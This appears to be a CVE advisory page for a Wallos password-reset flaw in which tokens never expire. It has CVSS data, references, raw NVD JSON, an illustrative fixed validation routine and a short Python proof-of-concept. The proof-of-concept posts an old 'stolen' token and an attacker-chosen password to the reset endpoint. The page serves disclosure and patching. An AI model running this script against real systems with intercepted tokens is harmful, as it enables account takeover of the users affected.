Security Vulnerability Report
CVE-2026-33417 CVSS 6.5 MEDIUM

Published: 2026-03-24 19:16:54
Last Modified: 2026-03-26 20:59:31

Description

Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.2, password reset tokens in Wallos never expire. The password_resets table includes a created_at timestamp column, but the token validation logic never checks it. A password reset token remains valid indefinitely until it is used, allowing an attacker who intercepts a reset link at any point to use it days, weeks, or months later. This issue has been patched in version 4.7.2.
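The check the description says is missing, shown as an added illustration (not Wallos code): the pre-4.7.2 lookup that accepts any existing token beside a hardened lookup that enforces a lifetime on created_at and purges expired rows. The table and column names mirror the description; the sqlite3 schema, the one-hour lifetime and the ISO-8601 timestamp format are assumptions.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Assumed lifetime for a reset token; Wallos' actual value is not given in the advisory.
TOKEN_TTL = timedelta(hours=1)


def make_db():
    """Constructed in-memory table using the password_resets / created_at names from the advisory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE password_resets (user_id INTEGER, token TEXT, created_at TEXT)")
    return db


def validate_vulnerable(db, token):
    """Pre-4.7.2 behaviour as described: any stored token is accepted, created_at is never read."""
    row = db.execute("SELECT user_id FROM password_resets WHERE token = ?", (token,)).fetchone()
    return row[0] if row else None


def validate_fixed(db, token, now=None):
    """Hardened check: the row must exist AND created_at must be within TOKEN_TTL of now.
    Expired rows are deleted so a stale link cannot be retried later."""
    now = now or datetime.now(timezone.utc)
    row = db.execute("SELECT user_id, created_at FROM password_resets WHERE token = ?",
                     (token,)).fetchone()
    if row is None:
        return None
    created = datetime.fromisoformat(row[1])
    if now - created > TOKEN_TTL:
        db.execute("DELETE FROM password_resets WHERE token = ?", (token,))
        return None
    return row[0]


def demo():
    """Constructed data: one token issued three weeks ago, one issued five minutes ago."""
    db = make_db()
    now = datetime(2026, 3, 24, 12, 0, tzinfo=timezone.utc)
    weeks_old = (now - timedelta(weeks=3)).isoformat()
    fresh = (now - timedelta(minutes=5)).isoformat()
    db.executemany("INSERT INTO password_resets VALUES (?, ?, ?)",
                   [(1, "old-token", weeks_old), (2, "fresh-token", fresh)])
    return {
        "vuln_old": validate_vulnerable(db, "old-token"),    # accepted: the reported bug
        "fixed_old": validate_fixed(db, "old-token", now),   # rejected and purged
        "fixed_fresh": validate_fixed(db, "fresh-token", now),
    }


if __name__ == "__main__":
    print(demo())
```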

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
Weakness: CWE-613 (Insufficient Session Expiration)

The score above is the Secondary (advisory source) assessment in the record; NVD's Primary assessment rates the issue 7.1 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N, treating the interception of the reset link as user interaction rather than high attack complexity.

Configurations (Affected Products)

cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:* - VULNERABLE
Wallos < 4.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-33417 (Wallos Password Reset Token Expiration Bypass)
This script demonstrates that an old password reset token can be used indefinitely.
Note: This requires a valid token obtained previously.
"""
import requests

target_url = "http://localhost/wallos"
# Example token obtained from an email or log weeks ago
stolen_token = "abc123xyz-old-token-2025"
new_password = "AttackerPass123!"

# The endpoint that processes the password reset
reset_endpoint = f"{target_url}/reset-password"

payload = {
    "token": stolen_token,
    "password": new_password,
    "confirm_password": new_password
}

print(f"[*] Attempting to use old token: {stolen_token}")
try:
    response = requests.post(reset_endpoint, data=payload)
    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Password reset successfully using the old token!")
        print("[+] The vulnerability is confirmed: Token does not expire.")
    else:
        print(f"[-] Failed or invalid response. Status: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/ellite/Wallos/commit/90bb6186ee4091590b6efdef824c85f2494ff2bb (Patch)
https://github.com/ellite/Wallos/security/advisories/GHSA-p3fv-m43r-3fhf (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33417", "sourceIdentifier": "[email protected]", "published": "2026-03-24T19:16:53.540", "lastModified": "2026-03-26T20:59:31.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.2, password reset tokens in Wallos never expire. The password_resets table includes a created_at timestamp column, but the token validation logic never checks it. A password reset token remains valid indefinitely until it is used, allowing an attacker who intercepts a reset link at any point to use it days, weeks, or months later. This issue has been patched in version 4.7.2."}, {"lang": "es", "value": "Wallos es un rastreador de suscripciones personal de código abierto y autoalojable. Antes de la versión 4.7.2, los tokens de restablecimiento de contraseña en Wallos nunca caducaban. La tabla password_resets incluye una columna de marca de tiempo created_at, pero la lógica de validación del token nunca la verifica. Un token de restablecimiento de contraseña permanece válido indefinidamente hasta que se utiliza, permitiendo a un atacante que intercepta un enlace de restablecimiento en cualquier momento usarlo días, semanas o meses después. Este problema ha sido parcheado en la versión 4.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.7.2", "matchCriteriaId": "8D7E175D-54D9-47F3-8124-8E017924D210"}]}]}], "references": [{"url": "https://github.com/ellite/Wallos/commit/90bb6186ee4091590b6efdef824c85f2494ff2bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-p3fv-m43r-3fhf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}